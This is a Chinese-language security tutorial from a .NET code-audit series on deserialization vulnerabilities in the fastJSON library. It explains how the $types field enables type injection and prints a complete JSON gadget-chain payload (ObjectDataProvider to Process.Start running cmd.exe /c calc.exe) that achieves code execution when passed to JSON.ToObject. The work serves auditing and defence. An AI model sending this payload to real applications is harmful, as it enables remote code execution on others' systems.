.NET高階程式碼審計(第三課)Fastjson反序列化漏洞
作者:Ivan1ee@360雲影實驗室
0X00 前言
Java中的Fastjson曾經爆出了多個反序列化漏洞和Bypass版本,而在.Net領域也有一個Fastjson的庫,作者官宣這是一個讀寫Json效率最高的的.Net 元件,使用內建方法JSON.ToJSON可以快速序列化.Net物件。讓你輕鬆實現.Net中所有型別(物件,基本資料型別等)和Json之間的轉換,fastjson是一個開源的Json.Net庫,下載地址 http://www.codeproject.com/Articles/159450/fastJSON ,反序列過程中詳細的效能對比如下
從圖上得出和老牌Json.Net、Stack等比起來速度和效能優勢非常明顯,究其原因元件的作者利用反射生成了大量的IL程式碼,而IL程式碼是託管程式碼,可以直接給執行庫編譯所以效能就此大大提升。但在某些場景下開發者使用JSON.ToObject方法序列化不安全的資料時候會造成反序列化漏洞從而實現遠端RCE攻擊,本文筆者從原理和程式碼審計的視角做了相關介紹和復現。
0X01 Fastjson序列化
使用JSON.ToJSON可以非常方便的實現.NET物件與Json資料之間的轉化,ToJSON首先會得到物件名稱所在的程式集全限定名,並且作為$types這個key的值,再將物件的成員屬性名轉化為Json資料中的Key,把物件的成員屬性值轉化為Json資料中的value,下面通過一個例項來說明問題,首先定義TestClass物件
定義了三個成員,並實現了一個靜態方法ClassMethod啟動程序。 序列化通過建立物件例項分別給成員賦值
筆者為了儘量保證序列化過程不丟擲異常,所以引入了 JSON.ToJSON方法的第二個引數並例項化建立JSONParameters,它的欄位中有很多型別是布林值,
和反序列化漏洞相關的欄位為UseExtensions ,將它設定為true可得到類的全限定名,如果不需要序列化空值的時可將另一個欄位SerializeNullValues設為false; 筆者使用JSON.ToJSON後得到序列化的Json資料
{"$types":{"WpfApp1.TestClass, WpfApp1, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null":"1"},"$type":"1","Classname":"360","Name":"Ivan1ee","Age":18}
0x02 Fastjson反序列化
2.1、反序列化用法
反序列過程就是將Json資料轉換為物件,Fastjson通過建立一個新物件的方式呼叫JSON. ToObject方法實現的,ToObject有多個過載方法,當傳入兩個引數,第一個引數需要被序列化的資料、第二個引數設定序列化配置選項來指定JSONParameters按照指定的屬性值處理,過載方法參考下圖
具體程式碼可參考以下Demo
2.2、打造Poc
漏洞的觸發點也是在於被序列化的Json中的$types是否可控,為此官方文件裡也標註了警告。
筆者繼續選擇ObjectDataProvider類方便呼叫任意被引用類中的方法,具體有關此類的用法可以看一下《.NET高階程式碼審計(第一課) XmlSerializer反序列化漏洞》,因為Process.Start方法啟動一個執行緒需要配置ProcessStartInfo類相關的屬性,例如指定檔名、指定啟動引數,所以首先得考慮序列化ProcessStartInfo,如下程式碼Demo
一步步來看,開始從GetType獲取當前類的例項,返回Type型別變數t3;然後通過Type.GetProperty方法找到指定為FileName的公共屬性並賦值給PropertyInfo型別的變數propertyName;再使用PropertyInfo.SetValue方法設定物件的指定屬性值“cmd.exe“,同理為Arguments屬性指定值。下一步再來序列化Process類,並呼叫StartInfo啟動程式,Demo如下
然後需要對其做減法,去掉無關的System.RuntimeType、System.IntPtr資料,最終得到反序列化Payload
{""$types"":{""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"":""1"",""System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"":""3"",""System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"":""5""},""$type"":""1"",""ObjectInstance"":{""$type"":""3"",""StartInfo"":{""$type"":""5"",""Verb"":"""",""Arguments"":""/c calc.exe"",""CreateNoWindow"":false,""RedirectStandardInput"":false,""RedirectStandardOutput"":false,""RedirectStandardError"":false,""UseShellExecute"":true,""UserName"":"""",""Domain"":"""",""LoadUserProfile"":false,""FileName"":""cmd.exe"",""WorkingDirectory"":"""",""ErrorDialog"":false,""WindowStyle"":""Normal""},""EnableRaisingEvents"":false},""MethodName"":""Start"",""IsAsynchronous"":false,""IsInitialLoadEnabled"":true}
FastJson定義的JSON類定義了多個ToObject過載方法,對於反序列化漏洞無需關心過載的方法引數是一個還是多個,它們都可以觸發漏洞
筆者通過下面的Demo , JSON.ToObject(payload)反序列化成功彈出計算器。
0x03 程式碼審計視角
從程式碼審計的角度很容易找到漏洞的汙染點,通過前面幾個小節的知識能發現需要滿足一個關鍵條件JSON.ToObject傳入String或者Object就可以被反序列化,例如以下JSONSerializer類
攻擊者控制傳入字串引數json便可輕鬆實現反序列化漏洞攻擊。Github上也存在大量的不安全案例程式碼,如下
0x04 案例覆盤
最後再通過下面案例來複盤整個過程,全程展示在VS裡除錯裡通過反序列化漏洞彈出計算器。
- 輸入 http://localhost:5651/Default Post載入value值
- 通過ToObject 反序列化 ,並彈出計算器
最後附個動態圖
0x05 總結
Fastjson憑藉速度和效能上的優勢佔得一席之地,但隨著newtonsoft.Json的主流化,效能上已經逐漸趕超了Fastjson,也使得Fastjson越來越小眾化,對於攻擊者來說,利用成本很低,在程式碼審計配合的情況下這種安全問題越發的嚴重起來,若提交惡意的汙染資料,便可水到渠成的反序列化成功拿下目標,最後.NET反序列化系列課程筆者會同步到 https://github.com/Ivan1ee/ 、 https://ivan1ee.gitbook.io/ ,後續筆者將陸續推出高質量的.NET反序列化漏洞文章,歡迎大夥持續關注,交流,更多的.NET安全和技巧可關注實驗室公眾號。
